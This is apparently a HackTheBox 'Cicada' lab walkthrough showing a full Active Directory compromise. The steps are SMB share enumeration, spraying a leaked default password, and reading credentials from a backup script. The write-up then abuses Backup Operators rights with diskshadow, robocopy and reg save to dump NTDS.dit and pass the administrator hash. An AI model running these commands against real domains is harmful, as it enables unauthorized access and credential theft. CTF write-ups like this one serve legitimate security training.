HTB - Cicada

Last updated 2 months ago

HTB - Cicada

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nmap -F $ip -Pn

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open wsman

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo nmap  -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo nmap -sU -p- --min-rate 10000 -oN Nmap/udp

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Active Directory LDAP (Domain: cicada.htb0)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Active Directory LDAP (Domain: cicada.htb0)
3268/tcp open  ldap          Active Directory LDAP (Domain: cicada.htb0)
3269/tcp open  ssl/ldap      Active Directory LDAP (Domain: cicada.htb0)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS - RPC - SMB - winRM - ldap
* Important notes: Domain: cicada.htb - commonName=CICADA-DC.cicada.htb

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo sh -c "echo  '$ip CICADA-DC cicada.htb CICADA-DC.cicada.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ tail -n 1 /etc/hosts
10.10.11.35 CICADA-DC cicada.htb CICADA-DC.cicada.htb

DNS Enumeration

Zone transfer failed

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ dig axfr cicada.htb @$ip

; <<>> DiG 9.20.1-1-Debian <<>> axfr cicada.htb @10.10.11.35
;; global options: +cmd
; Transfer failed.

RPC Enumeration

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ rpcclient -U '%' $ip

rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

SMB Enumeration

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ smbclient -N -L //$ip    

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u '' -p '' --shares                                                         
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\: 
SMB         10.10.11.35     445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' --shares

SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share

I then used spider_plus module from nxc to crawl the shares and list all the files inside. I found Notice from HR.txt that could be interesting.

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' -M spider_plus  

{
    "HR": {
        "Notice from HR.txt": {
            "atime_epoch": "2024-08-28 13:31:48",
            "ctime_epoch": "2024-03-14 08:29:03",
            "mtime_epoch": "2024-08-28 13:31:48",
            "size": "1.24 KB"
        }
    }
}

Using smbclient from impacket, I connected to the share and downloaded all the files inside by mget * command

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-smbclient cicada.htb/guest:''@$ip

# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use HR
# mget *
[*] Downloading Notice from HR.txt
# exit

Initial Access

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat Notice\ from\ HR.txt                                                          

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

After reading the file, I got a password that can be sprayed to domain users. Then, I enumerated the domain users by bruting rid (Relative Identifier) technique

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' --rid-brute

..snip..

SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

With the list of usernames, I could attempt the password I got against each one

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat users.list 

john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u users.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

The password only worked for michael.wrightson. I did my next move by firing up ldapdomaindump for quick users and groups mapping

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $bloodhound-python -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.10.11.35 -d cicada.htb

INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Found 9 users
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 25S

┌──(kali㉿kali)-[~/…/platform/machines/Cicada/ldapdomaindump]
└─$ ldapdomaindump ldap://$ip -u 'cicada\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Lateral Movement

Domain Users info

From the users' info page, I got the following:
- emily.oscars => Member of (Remote Management Users, Backup Operators)
- david.orelious => password:'aRt$Lp#7t*VQ!3'

With the password of david user, I will check share access again and it has READ access on most of the shares.

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares

SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ            
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

Using spider_plus again, I found Backup_script.ps1

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus

..snip..
{
    "DEV": {
        "Backup_script.ps1": {
            "atime_epoch": "2024-08-28 13:28:22",
            "ctime_epoch": "2024-03-14 08:31:38",
            "mtime_epoch": "2024-08-28 13:28:22",
            "size": "601 B"
        }

Download the file to examine it

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-smbclient cicada.htb/'david.orelious':'aRt$Lp#7t*VQ!3'@$ip          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use DEV
# mget *
[*] Downloading Backup_script.ps1

From the file below, It's a backup script file used to backup SMB files using emily credentials

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#Mxxxxxxxx" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

As we saw previously, emily is a member of Remote Management User, So she can access the box using winRM

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ evil-winrm -i $ip -u emily.oscars -p 'Q!3@Lp#Mxxxxxxxx'

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt
1933e43bb4bcd65536axxxxxxxxxxxxxxxxx

User Flag: 1933e43bb4bcd65536axxxxxxxxxxxxxxxxx

Privilege Escalation

Emily is a member of privileged group Backup Operator, So she can backup files from the DC. In our case, the most interesting files are NTDS, SYSTEM, SAM registry hives

NTDS: The database of the domain controller containing all objects' credentials
SYSTEM: Registry key that contains decryption key
SAM: The database of local system accounts

The principal of this attack is simple as we abuse Backup privileges to create shadow copy of specific file (NTDS.DIT in our case) and extract the domain secrets from it

I created a .vss file containing instruction for diskshadow utility to backup NTDS

more C:\Users\Public\diskshadowscript.txt

set context persistent nowriters
set metadata c:\windows\temp\file.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% p:
end backup

Then execute the tool with the following command

diskshadow.exe /s C:\programdata\shadow.vss

If you face error when running diskshadow, try to run unix2doscommand to convert the file to windows formatting

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $unix2dos shadow.vss 
unix2dos: converting file shadow.vss to DOS format...

Copy the ntds.dit to working directory and download it using evil-winrm

robocopy /b P:\Windows\ntds\ C:\programdata ntds.dit

Backup SYSTEM registry hive

*Evil-WinRM* PS C:\programdata> reg save HKLM\SYSTEM system.save
The operation completed successfully.

After downloading the two files, I used secretsdump.py to extract administrator's hash

┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-secretsdump -system system.save -ntds ntds.dit LOCAL | grep -i administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0eaxxxxxxxxxxxxxx:::

Access the DC and get the root flag

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0eaxxxxxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b53cd8bd68d39d7eb1xxxxxxxxxxxxxx

Root flag: b53cd8bd68d39d7eb1xxxxxxxxxxxxxx

Shortcut

I can read the root flag with backup privileges using robocopy :)

*Evil-WinRM* PS C:\programdata> robocopy /b C:\Users\Administrator\Desktop\ C:\programdata root.txt

*Evil-WinRM* PS C:\programdata> cat root.txt
b53cd8bd68d39d7eb1c4xxxxxxxxxxxxxxx

PreviousHTB - EscapeTwo NextMedium